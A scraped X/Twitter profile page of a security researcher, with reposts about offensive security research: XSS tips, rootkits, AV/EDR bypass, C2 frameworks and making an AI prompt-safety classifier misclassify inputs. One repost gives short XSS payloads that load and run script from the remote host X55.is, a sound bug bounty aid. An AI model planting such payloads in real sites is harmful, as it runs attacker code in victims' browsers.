febin0x1's profile picture. CEH(Master) | eJPT 
 | OSCP | CRTP | eWPTX | 13x CVE | {passion:hacking} |

StarGazer, loves Astronomy 
#infosec #cybersecurity #hacking

Febin

@febin0x1

CEH(Master) | eJPT | OSCP | CRTP | eWPTX | 13x CVE | {passion:hacking} | StarGazer, loves Astronomy #infosec #cybersecurity #hacking

Disappointed by @guviofficial. My friend canceled their course & was confirmed for a refund (loan via Propelled). ​Despite cancellation, they were forced to pay the 1st EMI on Oct 31. Now, Guvi has reversed course, denying the refund entirely! 🤯 #Guvi #Propelled #StudentLoan


Febin heeft deze post opnieuw geplaatst

Improve your #BugBounty reports Using a Remote #XSS Call 1. import('//X55.is') x55.is/brutelogic/xss… 2. $.getScript`//X55.is` (requires jQuery) x55.is/brutelogic/xss… 3. appendChild(createElement`script`).src='//X55.is' x55.is/brutelogic/xss… #hack2learn #hack2earn


Febin heeft deze post opnieuw geplaatst

Heads up to #mobile pentesters: I've ported my @NowSecureMobile #Frida scripts (#iOS and #Android) to Frida 17, which introduced some breaking changes. The original scripts from 2017 are preserved as release 0.1 for compatibility and historical reference. github.com/0xdea/frida-sc…


Febin heeft deze post opnieuw geplaatst

I just wrote about Windows User-Mode Heap Exploitation. mrt4ntr4.github.io/Windows-Heap-E… Based on a HitconCTF challenge by @scwuaptx, it walks through exploiting a heap overflow vulnerability and abusing file-structure corruption to achieve arbitrary read/write! Hope you like it 🍻

MrT4ntr4's tweet image. I just wrote about Windows User-Mode Heap Exploitation.
mrt4ntr4.github.io/Windows-Heap-E…
Based on a HitconCTF challenge by @scwuaptx, it walks through exploiting a heap overflow vulnerability and abusing file-structure corruption to achieve arbitrary read/write! Hope you like it 🍻
MrT4ntr4's tweet image. I just wrote about Windows User-Mode Heap Exploitation.
mrt4ntr4.github.io/Windows-Heap-E…
Based on a HitconCTF challenge by @scwuaptx, it walks through exploiting a heap overflow vulnerability and abusing file-structure corruption to achieve arbitrary read/write! Hope you like it 🍻

Febin heeft deze post opnieuw geplaatst

Puppy is a nice AD assume breach box. I'll abuse GenericWrite on a group, GenericAll on a user, bruteforce a KeepassXC DB, find creds in a config, and dump DPAPI stored credentials. 0xdf.gitlab.io/2025/09/27/htb…


Febin heeft deze post opnieuw geplaatst

''Windows Inter Process Communication A Deep Dive Beyond the Surface - Part 2'' #infosec #pentest #redteam #blueteam sud0ru.ghost.io/windows-inter-…


Febin heeft deze post opnieuw geplaatst

New blog post is up! Stepping out of my comfort zone (be kind), looking at Meta's Prompt Guard 2 model, how to misclassify prompts using the Unigram tokenizer and hopefully demonstrate why we should invest time looking beyond the API at how LLMs function. specterops.io/blog/2025/06/0…


Febin heeft deze post opnieuw geplaatst

Okay so this is HUGE - our amazing AI red team have open sourced their AI red team labs so you can set up your own training! aka.ms/AIRTlabs @ram_ssk


Febin heeft deze post opnieuw geplaatst

Beginners introduction to Linux kernel rootkits inferi.club/post/the-art-o… #Linux #cybersecurity

0xor0ne's tweet image. Beginners introduction to Linux kernel rootkits

inferi.club/post/the-art-o…

#Linux #cybersecurity

Febin heeft deze post opnieuw geplaatst

I've received messages about credit for discovering executing arbitrary JS in Electron applications. I was not the first person to discover this, just the first to make a whole C2 for it in Node.JS instead of executing a command to load a beacon. If you have prior published…


Febin heeft deze post opnieuw geplaatst

In depth analysis of Scudo’s internals security measures (Android’s Hardened Memory Allocator) usenix.org/system/files/w… #infosec #Android

0xor0ne's tweet image. In depth analysis of Scudo’s internals security measures (Android’s Hardened Memory Allocator)

usenix.org/system/files/w…

#infosec #Android

Febin heeft deze post opnieuw geplaatst

🆕 REPORT: Our first investigation into Israel-based spyware company Paragon Solutions reveals multiple threads linked to the proliferation of its mercenary spyware operations across the globe. citizenlab.ca/2025/03/a-firs…


Febin heeft deze post opnieuw geplaatst

Amazing blog post by Bobby! Highly recommend if you’re interested in red teaming ttps against hardened environments. Stay tuned for a follow up post from me on abusing trusted electron apps to bypass the strictest WDAC policies and execute shellcode natively 👀

Loki C2 blog drop! Thank you for all those who helped and all the support from the community. Big shoutout to @d_tranman and @chompie1337 for all their contributions to Loki C2! @IBM @IBMSecurity @XForce securityintelligence.com/x-force/bypass…



Febin heeft deze post opnieuw geplaatst

STAR Labs Windows Exploitation Challenge Writeup We're happy to announce that @Fr0st1706 solved our recent Windows exploitation challenge & earned a ticket to @offbyoneconf ! 🎉 Full writeup here: starlabs.sg/blog/2025/03-s… Thank you to everyone who participated!


Febin heeft deze post opnieuw geplaatst

BypassAV. List of essential techniques to bypass anti-virus and EDR github.com/matro7sh/Bypas…


Loading...

Something went wrong.


Something went wrong.